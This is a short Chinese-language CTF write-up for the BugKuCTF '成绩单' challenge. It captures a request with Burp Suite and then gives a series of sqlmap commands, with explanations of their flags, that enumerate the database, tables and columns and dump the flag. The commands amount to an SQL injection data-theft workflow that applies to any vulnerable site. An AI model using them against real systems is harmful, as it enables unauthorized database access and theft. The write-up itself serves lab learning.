- 工具 BurpSuite Chrome插件Proxy SwitchyOmega sqlmap
- 示例:BugKuCTF题 成绩单
初步测试1
BurpSuite开启代理,随意输入一个id,BurpSuite导出为文件
image.png
拿出命令行,准备开撸
命令
sqlmap -r 成绩单.txt -p id --current-db 获取当前数据库名称参数说明
-r 加载一个文件
-p 指定参数
--current-db 获取数据库名称
此外
-u 指定url
--method POST POST方式,搭配 --data "id=1" 食用
--cookie "id=1" 带上cookie
-threads 指定线程数
--dbms 指定数据库类型
拿到数据库名
命令sqlmap -r 成绩单.txt -p id -D skctf_flag --tables 获取指定数据库的表
-D 指定数据库名称
--tables 列举数据库中的表
拿到表名
命令
sqlmap -r 成绩单.txt -p id -D skctf_flag -T fl4g --columns获取指定表的字段
image.png
命令
sqlmap -r 成绩单.txt -p id -D skctf_flag -T fl4g -C skctf_flag --dump打印指定字段的内容
image.png
网友评论